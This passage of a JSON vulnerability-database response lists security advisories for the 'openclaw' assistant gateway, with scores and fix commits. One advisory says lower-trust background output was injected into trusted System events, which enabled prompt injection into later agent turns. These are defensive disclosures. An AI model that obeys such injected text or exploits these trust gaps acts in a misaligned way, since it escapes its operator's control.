V:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:54Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-webhook-password-rate-limiting"},{"reference_url":"https://github.com/advisories/GHSA-xq8g-hgh6-87hv","reference_id":"GHSA-xq8g-hgh6-87hv","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xq8g-hgh6-87hv"}],"fixed_packages":[],"aliases":["CVE-2026-35623","GHSA-xq8g-hgh6-87hv"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4nwq-14y4-xkhp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/92152?format=json","vulnerability_id":"VCID-4u3z-rs45-gbhe","summary":"OpenClaw: Workspace dotenv files cannot override connector endpoint hosts\n## Summary\nWorkspace dotenv files cannot override connector endpoint hosts.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nA workspace .env file could set connector endpoint variables for Matrix, Mattermost, IRC, or Synology-related connectors and redirect runtime traffic away from the operator-configured endpoint.\n\n## Fix\nWorkspace .env loading now blocks those endpoint variables, including per-account Matrix homeserver suffixes and generic base-url/API-host style overrides. Trusted global runtime dotenv loading remains separate.\n\n## Fix Commit(s)\n- 0623079e98abf7202591f1b04a89755eb7ec9272\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @qi-scape for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-45003","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01337","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01342","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01341","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-45003"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/0623079e98abf7202591f1b04a89755eb7ec9272","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"4.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:02Z/"}],"url":"https://github.com/openclaw/openclaw/commit/0623079e98abf7202591f1b04a89755eb7ec9272"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-55cf-xx38-4p9p","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:02Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-55cf-xx38-4p9p"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45003","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45003"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-connector-endpoint-host-override-via-workspace-dotenv-files","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"4.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:02Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-connector-endpoint-host-override-via-workspace-dotenv-files"},{"reference_url":"https://github.com/advisories/GHSA-55cf-xx38-4p9p","reference_id":"GHSA-55cf-xx38-4p9p","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-55cf-xx38-4p9p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114466?format=json","purl":"pkg:npm/openclaw@2026.4.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-ye4t-n6r3-67ab"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"}],"aliases":["CVE-2026-45003","GHSA-55cf-xx38-4p9p"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4u3z-rs45-gbhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91107?format=json","vulnerability_id":"VCID-4uqc-3h1c-4yhs","summary":"OpenClaw: Feishu webhook reads and parses unauthenticated request bodies before signature validation\n## Summary\n\nFeishu webhook reads and parses unauthenticated request bodies before signature validation\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nFeishu webhook handling previously parsed JSON before signature validation, which let unauthenticated callers force full JSON parsing work before rejection. Commit `5e8cb22176e9235e224be0bc530699261eb60e53` reads the raw request body, validates the signature first, and only then parses JSON.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `5e8cb22176e9235e224be0bc530699261eb60e53`.\n\n## Fix Commit(s)\n\n- `5e8cb22176e9235e224be0bc530699261eb60e53`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35640","reference_id":"","reference_type":"","scores":[{"value":"0.00127","scoring_system":"epss","scoring_elements":"0.31558","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00127","scoring_system":"epss","scoring_elements":"0.31486","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00127","scoring_system":"epss","scoring_elements":"0.31523","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35640"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/5e8cb22176e9235e224be0bc530699261eb60e53","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:25:51Z/"}],"url":"https://github.com/openclaw/openclaw/commit/5e8cb22176e9235e224be0bc530699261eb60e53"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3h52-cx59-c456","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:25:51Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3h52-cx59-c456"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35640","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35640"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-unauthenticated-webhook-request-parsing","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:25:51Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-unauthenticated-webhook-request-parsing"},{"reference_url":"https://github.com/advisories/GHSA-3h52-cx59-c456","reference_id":"GHSA-3h52-cx59-c456","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3h52-cx59-c456"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-35640","GHSA-3h52-cx59-c456"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4uqc-3h1c-4yhs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89602?format=json","vulnerability_id":"VCID-4urc-4536-pqhk","summary":"OpenClaw: Lower-trust background runtime output is injected into trusted `System:` events, and local async exec completion misses the intended `exec-event` downgrade\n## Impact\n\nLower-trust background runtime output is injected into trusted `System:` events, and local async exec completion misses the intended `exec-event` downgrade.\n\nLower-trust runtime/background output could be promoted into trusted System events, allowing prompt-injection into later agent turns.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @tdjackey for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gfmx-pph7-g46x","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gfmx-pph7-g46x"},{"reference_url":"https://github.com/advisories/GHSA-gfmx-pph7-g46x","reference_id":"GHSA-gfmx-pph7-g46x","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gfmx-pph7-g46x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["GHSA-gfmx-pph7-g46x"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4urc-4536-pqhk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90905?format=json","vulnerability_id":"VCID-5atj-2a7b-57g5","summary":"OpenClaw: Gateway `operator.write` can reach admin-only persisted `verboseLevel` via `chat.send` `/verbose`\n## Summary\n\nThe `chat.send` path let authorized write-scoped callers persist `/verbose` session overrides even though the same stored session mutation is admin-only through `sessions.patch`.\n\n## Impact\n\nA write-scoped gateway caller could persist verbose output for later runs and expose more reasoning or tool output than the operator intended.\n\n## Affected Component\n\n`src/auto-reply/reply/directive-handling.impl.ts, src/gateway/sessions-patch.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `c603123528` (`fix(gateway): require admin for persisted verbose defaults`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41344","reference_id":"","reference_type":"","scores":[{"value":"0.00086","scoring_system":"epss","scoring_elements":"0.24925","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00086","scoring_system":"epss","scoring_elements":"0.24857","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00086","scoring_system":"epss","scoring_elements":"0.24914","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41344"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c6031235288a8d3bdf2243bd974340d8c8045bc2","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/c6031235288a8d3bdf2243bd974340d8c8045bc2"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5h2w-qmfp-ggp6","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_